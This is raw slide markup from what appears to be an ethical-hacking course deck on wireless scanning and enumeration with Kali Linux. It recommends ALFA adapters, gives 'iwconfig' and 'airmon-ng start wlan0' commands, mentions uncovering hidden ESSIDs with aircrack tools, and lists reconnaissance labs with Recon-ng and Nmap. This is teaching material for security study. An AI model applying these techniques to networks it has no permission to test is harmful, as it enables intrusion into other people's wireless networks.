                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) contains a list of known compatible wireless adaptors.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The most reliable adapters that can be used with Kali are the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ALFA NETWORK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> cards, especially the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>AWUS036NH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>adaptors, which support wireless 802.11 b, g, and n protocols. The Alfa cards are readily available online and will support all the tests and attacks delivered using Kali.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The aircrack tools are particularly well suited to capture the data needed to unhide a hidden ESSID, as shown in the following steps:</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym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p27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spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Scanning</a:t>
            </a:r>
            <a:endParaRPr sz="3300" b="1">
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1865" name="Google Shape;1865;p270"/>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42900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>At the terminal, confirm that wireless is enabled on the attacking system by entering the following command:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="279400" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="1">
                <a:highlight>
                  <a:srgbClr val="F3F3F3"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Command:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" i="1">
                <a:highlight>
                  <a:srgbClr val="F3F3F3"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> iwconfig</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1">
              <a:highlight>
                <a:srgbClr val="F3F3F3"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1866" name="Google Shape;1866;p270"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="290500" y="2233072"/>
            <a:ext cx="8562975" cy="2780775"/>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271"/>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spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Wireless Enumeration</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1872" name="Google Shape;1872;p271"/>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0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This step involves setting up the correct hardware and software for Wi-Fi hacking. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Some operating systems, like Windows, allow you to listen to traffic but don’t permit you to inject Wi-Fi traffic, while others, like Linux, allow both. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Also, some important tools used in Wi-Fi hacking like Aircrack-ng work only with specific Wireless adapters. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Once the right hardware and software has been set up, tools like Wireshark can be used to analyze wireless traffic.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="150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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="86148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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Port Scan, Network Scan, TCP Connect, UDP Scan, Version Scan, OS Scan…. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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27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spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Wireless Enumeration</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1878" name="Google Shape;1878;p272"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="863550"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Enable your wireless interface by entering the following (you may need to replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>wlan0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> with an available wireless interface that was identified in the previous step):</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="279400" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="1">
                <a:highlight>
                  <a:srgbClr val="F3F3F3"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Command:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" i="1">
                <a:highlight>
                  <a:srgbClr val="F3F3F3"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> airmon-ng start wlan0</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1">
              <a:highlight>
                <a:srgbClr val="F3F3F3"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1879" name="Google Shape;1879;p272"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2099750"/>
            <a:ext cx="8391525" cy="282150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27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spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
